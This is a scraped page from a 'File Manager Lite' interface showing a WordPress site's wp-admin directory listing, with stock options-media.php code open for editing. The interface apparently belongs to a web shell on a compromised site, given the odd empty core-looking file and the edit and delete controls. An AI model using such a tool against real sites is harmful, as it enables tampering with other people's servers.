File Manager Lite
Dir:
/home/u540325668/domains/babyswimzone.com/public_html/wp-admin
Upload
[..]
about.php (17.74 KB)
Edit
Rename
Del
admin-functions.php (479 B)
Edit
Rename
Del
admin-header.php (9.12 KB)
Edit
Rename
Del
admin.php (12.35 KB)
Edit
Rename
Del
async-upload.php (5.47 KB)
Edit
Rename
Del
authorize-application.php (10.09 KB)
Edit
Rename
Del
comment.php (11.35 KB)
Edit
Rename
Del
credits.php (4.38 KB)
Edit
Rename
Del
css/
Rename
Del
custom-header.php (499 B)
Edit
Rename
Del
customize.php (11.01 KB)
Edit
Rename
Del
edit-comments.php (14.38 KB)
Edit
Rename
Del
edit-form-advanced.php (28.83 KB)
Edit
Rename
Del
edit-form-comment.php (8.34 KB)
Edit
Rename
Del
edit-tag-form.php (10.44 KB)
Edit
Rename
Del
edit-tags.php (22 KB)
Edit
Rename
Del
export.php (11.02 KB)
Edit
Rename
Del
freedoms.php (4.8 KB)
Edit
Rename
Del
images/
Rename
Del
includes/
Rename
Del
index.php (7.68 KB)
Edit
Rename
Del
install-helper.php (6.8 KB)
Edit
Rename
Del
js/
Rename
Del
link-add.php (934 B)
Edit
Rename
Del
link-manager.php (4.26 KB)
Edit
Rename
Del
link-parse-opml.php (2.72 KB)
Edit
Rename
Del
link.php (2.89 KB)
Edit
Rename
Del
load-scripts.php (2.02 KB)
Edit
Rename
Del
maint/
Rename
Del
media-new.php (3.2 KB)
Edit
Rename
Del
media-upload.php (3.58 KB)
Edit
Rename
Del
media.php (819 B)
Edit
Rename
Del
menu-header.php (9.82 KB)
Edit
Rename
Del
menu.php (17.46 KB)
Edit
Rename
Del
ms-admin.php (196 B)
Edit
Rename
Del
ms-delete-site.php (4.5 KB)
Edit
Rename
Del
ms-options.php (229 B)
Edit
Rename
Del
ms-themes.php (217 B)
Edit
Rename
Del
ms-upgrade-network.php (219 B)
Edit
Rename
Del
my-sites.php (4.74 KB)
Edit
Rename
Del
nav-menus.php (48.19 KB)
Edit
Rename
Del
network/
Rename
Del
network.php (5.39 KB)
Edit
Rename
Del
options-discussion.php (15.92 KB)
Edit
Rename
Del
options-general.php (21.65 KB)
Edit
Rename
Del
options-head.php (621 B)
Edit
Rename
Del
options-media.php (6.38 KB)
Edit
Rename
Del
options-mgklci.php (0 B)
Edit
Rename
Del
options-permalink.php (21.22 KB)
Edit
Rename
Del
options-reading.php (9.94 KB)
Edit
Rename
Del
plugin-editor.php (13.75 KB)
Edit
Rename
Del
plugin-install.php (6.96 KB)
Edit
Rename
Del
plugins.php (30 KB)
Edit
Rename
Del
post-new.php (2.7 KB)
Edit
Rename
Del
post.php (10.03 KB)
Edit
Rename
Del
press-this.php (2.34 KB)
Edit
Rename
Del
profile.php (283 B)
Edit
Rename
Del
revision.php (5.7 KB)
Edit
Rename
Del
site-editor.php (11.98 KB)
Edit
Rename
Del
site-health-info.php (3.99 KB)
Edit
Rename
Del
site-health.php (10.2 KB)
Edit
Rename
Del
theme-editor.php (16.87 KB)
Edit
Rename
Del
themes.php (47.92 KB)
Edit
Rename
Del
tools.php (3.43 KB)
Edit
Rename
Del
update-core.php (45.45 KB)
Edit
Rename
Del
update.php (12.79 KB)
Edit
Rename
Del
upgrade-functions.php (341 B)
Edit
Rename
Del
upload.php (14.9 KB)
Edit
Rename
Del
user/
Rename
Del
user-edit.php (40.36 KB)
Edit
Rename
Del
users.php (23.29 KB)
Edit
Rename
Del
widgets-form.php (19.29 KB)
Edit
Rename
Del
widgets.php (1.09 KB)
Edit
Rename
Del
Edit: options-media.php
<?php /** * Media settings administration panel. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_options' ) ) { wp_die( __( 'Sorry, you are not allowed to manage options for this site.' ) ); } // Used in the HTML title tag. $title = __( 'Media Settings' ); $parent_file = 'options-general.php'; $media_options_help = '<p>' . __( 'You can set maximum sizes for images inserted into your written content; you can also insert an image as Full Size.' ) . '</p>'; if ( ! is_multisite() && ( get_option( 'upload_url_path' ) || get_option( 'upload_path' ) && 'wp-content/uploads' !== get_option( 'upload_path' ) ) ) { $media_options_help .= '<p>' . __( 'Uploading Files allows you to choose the folder and path for storing your uploaded files.' ) . '</p>'; } $media_options_help .= '<p>' . __( 'You must click the Save Changes button at the bottom of the screen for new settings to take effect.' ) . '</p>'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $media_options_help, ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/settings-media-screen/">Documentation on Media Settings</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <form action="options.php" method="post"> <?php settings_fields( 'media' ); ?> <h2 class="title"><?php _e( 'Image sizes' ); ?></h2> <p><?php _e( 'The sizes listed below determine the maximum dimensions in pixels to use when adding an image to the Media Library.' ); ?></p> <table class="form-table" role="presentation"> <?php $thumbnail_size_title = __( 'Thumbnail size' ); ?> <tr> <th scope="row"><?php echo $thumbnail_size_title; ?></th> <td><fieldset><legend class="screen-reader-text"><span><?php echo $thumbnail_size_title; ?></span></legend> <label for="thumbnail_size_w"><?php _e( 'Width' ); ?></label> <input name="thumbnail_size_w" type="number" step="1" min="0" id="thumbnail_size_w" value="<?php form_option( 'thumbnail_size_w' ); ?>" class="small-text" /> <br /> <label for="thumbnail_size_h"><?php _e( 'Height' ); ?></label> <input name="thumbnail_size_h" type="number" step="1" min="0" id="thumbnail_size_h" value="<?php form_option( 'thumbnail_size_h' ); ?>" class="small-text" /> </fieldset> <input name="thumbnail_crop" type="checkbox" id="thumbnail_crop" value="1"<?php checked( '1', get_option( 'thumbnail_crop' ) ); ?> /> <label for="thumbnail_crop"><?php _e( 'Crop thumbnail to exact dimensions (normally thumbnails are proportional)' ); ?></label> </td> </tr> <?php $medium_size_title = __( 'Medium size' ); ?> <tr> <th scope="row"><?php echo $medium_size_title; ?></th> <td><fieldset><legend class="screen-reader-text"><span><?php echo $medium_size_title; ?></span></legend> <label for="medium_size_w"><?php _e( 'Max Width' ); ?></label> <input name="medium_size_w" type="number" step="1" min="0" id="medium_size_w" value="<?php form_option( 'medium_size_w' ); ?>" class="small-text" /> <br /> <label for="medium_size_h"><?php _e( 'Max Height' ); ?></label> <input name="medium_size_h" type="number" step="1" min="0" id="medium_size_h" value="<?php form_option( 'medium_size_h' ); ?>" class="small-text" /> </fieldset></td> </tr> <?php $large_size_title = __( 'Large size' ); ?> <tr> <th scope="row"><?php echo $large_size_title; ?></th> <td><fieldset><legend class="screen-reader-text"><span><?php echo $large_size_title; ?></span></legend> <label for="large_size_w"><?php _e( 'Max Width' ); ?></label> <input name="large_size_w" type="number" step="1" min="0" id="large_size_w" value="<?php form_option( 'large_size_w' ); ?>" class="small-text" /> <br /> <label for="large_size_h"><?php _e( 'Max Height' ); ?></label> <input name="large_size_h" type="number" step="1" min="0" id="large_size_h" value="<?php form_option( 'large_size_h' ); ?>" class="small-text" /> </fieldset></td> </tr> <?php do_settings_fields( 'media', 'default' ); ?> </table> <?php /** * @global array $wp_settings */ if ( isset( $GLOBALS['wp_settings']['media']['embeds'] ) ) : ?> <h2 class="title"><?php _e( 'Embeds' ); ?></h2> <table class="form-table" role="presentation"> <?php do_settings_fields( 'media', 'embeds' ); ?> </table> <?php endif; ?> <?php if ( ! is_multisite() ) : ?> <h2 class="title"><?php _e( 'Uploading Files' ); ?></h2> <table class="form-table" role="presentation"> <?php /* * If upload_url_path is not the default (empty), * or upload_path is not the default ('wp-content/uploads' or empty), * they can be edited, otherwise they're locked. */ if ( get_option( 'upload_url_path' ) || get_option( 'upload_path' ) && 'wp-content/uploads' !== get_option( 'upload_path' ) ) : ?> <tr> <th scope="row"><label for="upload_path"><?php _e( 'Store uploads in this folder' ); ?></label></th> <td><input name="upload_path" type="text" id="upload_path" value="<?php echo esc_attr( get_option( 'upload_path' ) ); ?>" class="regular-text code" /> <p class="description"> <?php /* translators: %s: wp-content/uploads */ printf( __( 'Default is %s' ), '<code>wp-content/uploads</code>' ); ?> </p> </td> </tr> <tr> <th scope="row"><label for="upload_url_path"><?php _e( 'Full URL path to files' ); ?></label></th> <td><input name="upload_url_path" type="text" id="upload_url_path" value="<?php echo esc_attr( get_option( 'upload_url_path' ) ); ?>" class="regular-text code" /> <p class="description"><?php _e( 'Configuring this is optional. By default, it should be blank.' ); ?></p> </td> </tr> <tr> <td colspan="2" class="td-full"> <?php else : ?> <tr> <td class="td-full"> <?php endif; ?> <label for="uploads_use_yearmonth_folders"> <input name="uploads_use_yearmonth_folders" type="checkbox" id="uploads_use_yearmonth_folders" value="1"<?php checked( '1', get_option( 'uploads_use_yearmonth_folders' ) ); ?> /> <?php _e( 'Organize my uploads into month- and year-based folders' ); ?> </label> </td> </tr> <?php do_settings_fields( 'media', 'uploads' ); ?> </table> <?php endif; ?> <?php do_settings_sections( 'media' ); ?> <?php submit_button(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?>
Simpan